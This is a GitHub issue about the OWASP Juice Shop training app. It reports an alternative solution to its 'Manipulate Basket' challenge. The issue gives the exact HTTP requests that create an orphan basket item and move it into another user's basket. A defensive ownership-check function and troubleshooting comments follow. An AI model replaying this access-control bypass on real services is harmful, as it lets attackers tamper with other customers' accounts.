
[🐛] Alternative solution for "Manipulate Basket"


🐛 Bug report

Description

There’s an alternative solution for the “Manipulate Basket” challenge. This solution is, however, not recognized by the Juice Shop. So, I think this solution should be either recognized as the correct one, or it should not be allowed.

🔬 Minimal Reproduction

1) Create new basket item

POST /api/BasketItems/
Content-type: application/json

{"quantity":3,"ProductId":19}
---
{"status":"success","data":{"id":21,"ProductId":19,"quantity":3,"updatedAt":"2020-08-26T22:22:36.821Z","createdAt":"2020-08-26T22:22:36.821Z"}}

The trick here is to delete the basketId property! The new basket item is created with a null basketId. Just to confirm it:

GET /api/BasketItems/21
---
{"status":"success","data":{"id":21,"quantity":3,"createdAt":"2020-08-26T22:22:36.821Z","updatedAt":"2020-08-26T22:22:36.821Z","BasketId":null,"ProductId":19}}

2) Add basket item to basket

Now we can put the basket item into another user’s basket (this wouldn’t be possible if the basket item had already been in someone’s basket):

PUT /api/BasketItems/21
Content-type: application/json

{"BasketId":"8"}
---
{"status":"success","data":{"id":21,"quantity":3,"createdAt":"2020-08-26T22:22:36.821Z","updatedAt":"2020-08-26T22:23:45.932Z","BasketId":"8","ProductId":19}}

🌳 Your Environment

Docker image, Juice Shop version v11.1.3
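The report above shows two server-side gaps: a BasketItem can be created with no BasketId, and a later PUT can attach it to any basket. The check below is an added example of how a handler could close both gaps; it is not Juice Shop's own code. It assumes a hypothetical `baskets` map from basket id to owning user id, and that `userId` always comes from the authenticated session, never from the request body.

```javascript
// Added example (not Juice Shop's code): ownership check for basket-item writes,
// written as a pure function so it can be unit-tested without Express or Sequelize.
// `existing` is the stored BasketItem (null on create), `body` the JSON payload,
// `baskets` a hypothetical Map of basket id -> owning user id.
function authorizeBasketItemWrite({ userId, baskets, existing, body }) {
  // Normalise the client value: "8" and 8 must be treated the same.
  const requested = body.BasketId === undefined ? undefined : String(body.BasketId);

  if (existing === null) {
    // Create: BasketId is mandatory, so no orphan item with BasketId null can exist.
    if (requested === undefined) return { ok: false, reason: 'BasketId required' };
    if (baskets.get(requested) !== userId) return { ok: false, reason: 'basket not owned by caller' };
    return { ok: true };
  }

  // Update: the item must already sit in a basket the caller owns ...
  if (baskets.get(String(existing.BasketId)) !== userId) {
    return { ok: false, reason: 'item not in caller basket' };
  }
  // ... and an item's basket may not be changed through the API at all.
  if (requested !== undefined && requested !== String(existing.BasketId)) {
    return { ok: false, reason: 'BasketId is immutable' };
  }
  return { ok: true };
}

// Constructed sample data mirroring the report: basket 8 belongs to user 2, basket 1 to user 1.
const sampleBaskets = new Map([['1', 1], ['8', 2]]);

// Replays the report's two requests (as user 1) against the check and returns both decisions.
function replayReport() {
  const step1 = authorizeBasketItemWrite({ userId: 1, baskets: sampleBaskets, existing: null,
    body: { quantity: 3, ProductId: 19 } });                      // BasketId omitted
  const orphan = { id: 21, BasketId: null, ProductId: 19, quantity: 3 }; // what the report obtained
  const step2 = authorizeBasketItemWrite({ userId: 1, baskets: sampleBaskets, existing: orphan,
    body: { BasketId: '8' } });                                    // move into basket 8
  return { step1, step2 };
}
```

With this check in place the first request is refused outright, so the orphan item that makes step 2 possible is never created.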

Issue Analytics

  • State: closed
  • Created 3 years ago
  • Comments:6 (3 by maintainers)

Top GitHub Comments

1 reaction
vernjan commented, Aug 27, 2020

Hi, maybe one of

  1. Does a basket with ID 42 exist?
  2. I remember I was getting some errors if quantity > 5
  3. I used basket ID as String, not Integer (not sure if it matters though)
  4. EDIT: Missing Content-type header?
0 reactions
github-actions[bot] commented, Aug 28, 2021

This thread has been automatically locked because it has not had recent activity after it was closed. 🔒 Please open a new issue for regressions or related bugs.
